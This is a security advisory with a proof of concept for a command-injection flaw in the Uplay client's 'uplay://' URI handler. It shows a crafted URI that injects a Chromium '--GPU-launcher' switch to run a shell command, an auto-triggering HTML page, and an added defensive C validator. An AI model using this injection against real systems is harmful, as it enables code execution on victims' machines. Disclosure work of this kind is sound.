Sep 20, 2018
# Exploit Title: Ubisoft Uplay Desktop Client 63.0.5699.0 – Remote Code Execution
# Date: 2018-09-01
# Exploit Author: Che-Chun Kuo
# Vulnerability Type: URI Parsing Command Injection
# Vendor Homepage: https://www.ubisoft.com/en-us/
# Software Link: https://uplay.ubi.com/
# Version: 63.0.5699.0
# Tested on: Windows, Microsoft Edge
# Advisory: https://forums.ubi.com/showthread.php/1912340-Uplay-PC-Client-July-17th-2018
# CVE: N/A
# Vulnerability
# The Uplay desktop client does not properly validate user-controlled data passed to its custom
# uplay URI protocol handler. This flaw can be used to exploit the Chromium Embedded Framework (CEF)
# integrated within the Uplay client, allowing for arbitrary code execution.
# Installing Uplay registers the following custom uplay protocol handler:
# HKEY_CLASSES_ROOT
#   uplay
#     (Default) = "URL:uplay Protocol"
#     URL Protocol = ""
#     DefaultIcon
#       (Default) = "upc.exe"
#     Shell
#       Open
#         Command
#           (Default) = "C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\upc.exe" "%1"
# The %1 will be replaced with arguments from the URI. The following crafted URI performs arbitrary code execution:
'uplay://foobar" --GPU-launcher="cmd /K whoami &" --'
# When a victim opens this URI, the string is passed to the Windows ShellExecute function.
# Microsoft states the following: “When ShellExecute executes the pluggable protocol handler with a
# string on the command line, any non-encoded spaces, quotes, and backslashes in the URI will
# be interpreted as part of the command line. This means that if you use C/C++’s argc and
# argv to determine the arguments passed to your application, the string may be broken
# across multiple parameters.”
# “Malicious parties could use additional quote or backslash characters to pass additional command
# line parameters. For this reason, pluggable protocol handlers should assume that any parameters on
# the command line could come from malicious parties, and carefully validate them.”
# The Uplay desktop client does not properly validate user-controlled data. An attacker can inject
# certain Chromium flags that allow for arbitrary code execution. The malicious URI breaks the
# command line with a quote character and inserts a new switch called --GPU-launcher. Since the
# Uplay client uses the Chromium Embedded Framework (CEF), Chromium command-line switches are supported.
# The --GPU-launcher switch provides a method to execute arbitrary commands. The following string shows
# the final command, which opens the Windows command prompt and executes the whoami program.
"C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\upc.exe" "foobar" --GPU-launcher="cmd /K whoami &" --"
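# Added example (not code from the advisory or from Ubisoft): one way a protocol handler could apply
# Microsoft's advice and refuse a split command line before any argument reaches CEF. The name
# handler_args_ok, the character allow-list and the length cap are assumptions made for illustration.

```c
#include <ctype.h>
#include <string.h>

#define SCHEME  "uplay://"
#define MAX_URI 2048            /* assumed length cap */

/* Characters accepted unencoded (RFC 3986 unreserved plus common delimiters).
 * Space, double quote and backslash are deliberately absent: those are the
 * characters that break "%1" into several command-line parameters. */
static int uri_char_ok(unsigned char c)
{
    return isalnum(c) || (c != '\0' && strchr("-._~/?=&:+,;@", c) != NULL);
}

/* Hypothetical first check in a handler's main().
 * Returns 1 only for exactly one argument that is a well-formed uplay:// URI. */
int handler_args_ok(int argc, char **argv)
{
    size_t i, n, s = strlen(SCHEME);

    /* "%1" must arrive as a single argument; more than one means the URI
     * escaped its quotes and supplied switches of its own. */
    if (argc != 2 || argv[1] == NULL)
        return 0;

    n = strlen(argv[1]);
    if (n <= s || n > MAX_URI)
        return 0;
    for (i = 0; i < s; i++)                 /* case-insensitive scheme match */
        if (tolower((unsigned char)argv[1][i]) != SCHEME[i])
            return 0;

    for (i = s; i < n; i++) {
        unsigned char c = (unsigned char)argv[1][i];
        if (c == '%') {                     /* escapes must be %XX */
            if (!isxdigit((unsigned char)argv[1][i + 1]) ||
                !isxdigit((unsigned char)argv[1][i + 2]))
                return 0;
            i += 2;
        } else if (!uri_char_ok(c)) {
            return 0;
        }
    }
    return 1;
}

int main(int argc, char **argv)
{
    return handler_args_ok(argc, argv) ? 0 : 1;
}
```

# The check keeps percent-escapes encoded; a handler that later decodes the URI must not paste the
# decoded text into another command line.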
# Attack Scenario
# The following attack scenario would result in the compromise of a victim’s machine with the vulnerable
# Uplay client installed. A user running Microsoft Edge visits a specially crafted webpage or clicks on a
# specially crafted link. The user is served with the prompt: Did you mean to switch apps? Microsoft Edge
# is trying to open “UPlay launcher”. After the user gives consent, the vulnerable application runs,
# resulting in arbitrary code execution in the context of the current process.
# This scenario also works on IE, but the IE browser shows the URI string to be opened and warns users against
# opening untrusted content. Microsoft Edge provides no such warning. Chrome and Firefox both escape
# illegal characters before passing the URI to the protocol handler.
# After the Uplay desktop client (upc.exe) is run, upc.exe will attempt to open additional executables
# before the --GPU-launcher switch is activated. One notable executable is UplayService.exe. UplayService
# requires elevated privileges. If the user is a non-administrative user, a UAC prompt will appear.
# It should be noted that this UAC prompt doesn't prevent command execution from occurring.
# Regardless of which option the user chooses within the UplayService UAC prompt (Yes/No),
# command execution will still occur once the code that passes the --GPU-launcher switch
# to the CEF is triggered within upc.exe.
# Proof of Concept
# The following POC provides two avenues to trigger the vulnerability within Microsoft Edge.
# The first method triggers when the webpage is opened. The second method triggers when the
# hyperlink is clicked by a user.
POC:
<!doctype html>
<a href='uplay://foobar" --GPU-launcher="cmd /K whoami &" --'>ubisoft uplay desktop client rce poc</a>
<script>
window.location = 'uplay://foobar" --GPU-launcher="cmd /K whoami &" --'
</script>